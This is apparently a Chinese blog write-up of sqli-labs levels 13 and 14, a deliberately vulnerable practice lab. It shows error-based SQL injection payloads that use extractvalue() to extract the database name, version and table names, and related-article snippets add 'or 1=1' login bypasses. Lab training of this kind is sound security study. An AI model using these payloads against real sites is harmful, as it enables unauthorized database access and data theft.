sqli-labs-master第13、14关。

最新推荐文章于 2024-03-02 20:27:11 发布
最新推荐文章于 2024-03-02 20:27:11 发布
阅读量1.1k 收藏 1
点赞数 1
分类专栏: 笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43606134/article/details/106072356
版权

前言:输入内容被放到双引号中,报错型注入,注释符不可用
第十三关:
http://192.168.89.134/sqli-labs-master/Less-13/
在这里插入图片描述
先输入:admin’)
在这里插入图片描述
我们还是分析一下:
在这里插入图片描述
我们接着用and来测试。
admin’) and 1=2#
在这里插入图片描述
-admin’) union selec 1,2#联合查询
在这里插入图片描述
还是没有报错,那我们就用报错语句来测试吧,这次我使用extractvalue()
显示版本,数据库
admin’) and extractvalue(1,concat(0x7e,(select database())))#
admin’) and extractvalue(1,concat(0x7e,(select version())))#
在这里插入图片描述
在这里插入图片描述
接着继续获取表名
-admin’) and (extractvalue(1,concat(0x5c,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x5c)))#
在这里插入图片描述
获取字段名
在这里插入图片描述
在这里插入图片描述
获取数据
在这里插入图片描述
十四关:
原理和十三关一样把’)换成’’

最后还是用sqlmap试一下
在这里插入图片描述
在这里插入图片描述
省略一系列步骤直接上结果
在这里插入图片描述
用sqlmap就很简单了

本文章为自己搭建实验环境做过的,参考过一些资料,希望对你有帮助

m__ing
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
Sqlilabs-13
KAKA的博客
07-07 363
还记得第 5 跟第 6 的双查询注入吗?(其实本质就是盲注),有了 5 6 卡的基础,再来玩 13 就很轻松了… 不过这里倒是有小小的疑惑…就是 hackbar 在这没有效果,必须得在方框内输入才可以…payload 我拿到 5 6 卡试过了都是有效的…这就很奇怪了,连最简单的 order by 都不返回任何报错信息…这就食用原生态方式吧 password 可以随便输入,这里只构造 username 的: admin') order by 3# 报错 admin') order by
sqli-labs第十三十四
m0_73248913的博客
02-08 101
sqli-labs第十三十四
Sqli-labs靶场第13详解[Sqli-labs-less-13]
最新发布
m0_73615178的博客
03-02 547
所以,payload分析输入一个username值然后使用单引号加小括号 ') 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。整条语句使用单引号加小括号 ") 闭合。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。当值为3时报错显示,所以列数为2,但是没有显示位,所以尝试报错注入。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。
sqli-labs第十三
yuqnqi的博客
05-09 360
第二个参数: xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。tip: 还有要注意的地方是,它能够查询的字符串长度最大是32个字符,如果超过32位,我们就需要用函数来查询,比如right(),left(),substr()来截取字符串。构造语句,先用 ') 进行闭合,判断列数是多少,持续增加列数,直到返回正确的结果。判断注入点的闭合方式。
sql二次注入-sqli-labs第13
weixin_46784800的博客
11-04 914
获取数据操作 判断所查询数据库中包含的列数 采用post进行参数输入: uname=') order by 3 -- - &passwd=') -- - 通过对查询结果进行排序,发现无法对第三列进行排序,且报错Unknown column ‘3’ in ‘order clause’,则说明所查询数据库中共有两列数据。 判断输出数据与数据库的联系 输入语句 uname=') or 1=1 -- - &passwd=') -- - 可发现界面只有登录成功的提示,则说明该网站为盲注,则
sqli-labs-master【Less-11/12/13/14/15/16】
weixin_44352521的博客
12-18 355
Less-11 进入Less-11之后,可以看到是全新的卡,是一个表单的形式,需要我们填入用户名和密码才可以提交,首先我们随便填入一个用户名和密码看页面会回显给我们什么内容? 我在这块用户名和密码都输入的是123,可以看到登陆尝试失败,不过这都不是重点,我们观察一下地址栏这块,我们提交的数据并没有体现在url中,说明11是POST注入,那么什么是POST注入呢?就是数据从客户端提交到服务器...
SQLi LABS Less-13 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-21 1万+
SQLi 第十三SQLi-LABS Less-13SQLi-LABS Less 13SQLiLABS Less13SQLi Less 13
sqli-labs/Less-13
m0_71299382的博客
11-18 255
sqli-labs第十三
sqli-labs第十三--十五
小人物的博客
06-18 3221
第十三 Double Injection- String- with twist(双注入 - 字符型 - 变形) 看一看它的源代码 POST传值没有任何过滤,@不显示输出,echo $sql;这个语句是我加的,为了显示再输入框中的语句是如何显示的 直接闭合,用户名和密码输入“ ‘) or (‘1’) = (‘1%23 ” 双引号里面的语句,前面的单引号加括号和sql中的括号单引号闭合,...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs-master前十一到二十总结
Alexz__的博客
02-11 1385
第十一 这里首先要明确一个概念:GET和POST的数据交流方式 GET是从服务器上获取数据,POST是向服务器传送数据。 从第十一开始就是POST方式交互数据,也就是向服务器传送数据 表现了向网站服务器发送的请求包中所包含的数据,网站服务器会从请求包中提取额相应必要的数据和服务器数据库比对,从而生成返回包即我们在浏览器上所能见到的web网页信息 先分析源代码: 这里...
sqli-labs通(十三)
qq_65950075的博客
05-03 503
报错原理:xml文档中查找字符位置是用/xxx/xxx/xxx/...这种格式,如果写入其他格式就会报错,并且会返回写入的非法格式内容,错误信息如:XPATH syntax error:'xxxxxxxx‘没有任何的返回信息,只有报错信息,那我们就用报错注入,让返回的报错信息包含我们的想要的信息。0x7e是~的意思,用concat拼接我们的sql语句,不符合xml文档的格式,就会报错,参数2:XPath_string(Xpath格式的字符串),注入时可操作的地方。作用:改变文档中符合条件的节点的值。
sqli-labs(less-13)
筱阳的博客
06-08 902
由less-12 可知  通过报错可知  是通过') 闭合的发现没有登入成功返回信息 ...看来是要盲注了...操作就像GET注入一样  只需要改union select 1,2 的信息即可盲注只能考虑sqlmap了......
sqli-labs less13
qq_45106794的博客
10-18 350
#sqli-labs less13 由于less12 和less 11 差不多,只是单引号变成 ") 所以我们直接来解决less 13 对待less13 我们按老规矩判断其是数值型还是字符型 。。。。。。 然后我们发现他是’) 所以我们继续往下走 admin ’ order by n # 发现n=1 n=2 虽然没有想象中的回显,但是当n=3时,可以发现 所以可以判断字段数为2 接下来试试adm...
sqli-labs (less11-less14)
Xi4or0uji
07-29 1484
less 11 post方法单引号绕过报错注入 这跟之前get方法的差不了多少,只是get方法换成了post方法 post数据uname=1' union select 1,group_concat(schema_name) from information_schema.schemata#&passwd=1可以得到 uname=1' union select 1,group...
Sqli-labs之Less-13和Less-14
→_→
04-05 1116
Less-13 POST单引号变形双注入 由题意可知,有单引号闭合的问题,所以在输入框中分别输入 1' 和 1,看返回结果: 报错,从信息中得知还有一个小括号,测试 1') or 1=1 -- # 登录成功发现不在返回用户名和密码信息。 从以上的信息中...
ATT&CK实战系列——红队实战(一)完整版
m_ing
08-05 3585
前言:今天有大佬位推荐了这个靶场,然后就去了解了一下非常贴近实战,下载开干! 靶场的描述:红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长 拓扑图如下所示: 这里的攻击机使用的kali,web服务器用的是win7,域成员分别是windows2003、windows2008。(你可能要问win7怎么做web服务器啊?我们用phpstudy集成环境鸭!
sqli-labs-master
07-22
sqli-labs-master是一个SQL注入漏洞测试平台,安装教程如下: 1. 下载sqli-labs-master压缩包并解压缩。 2. 安装LAMP或WAMP环境,确保Apache、MySQL和PHP已经安装并配置好。 3. 将解压缩后的sqli-labs-master...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值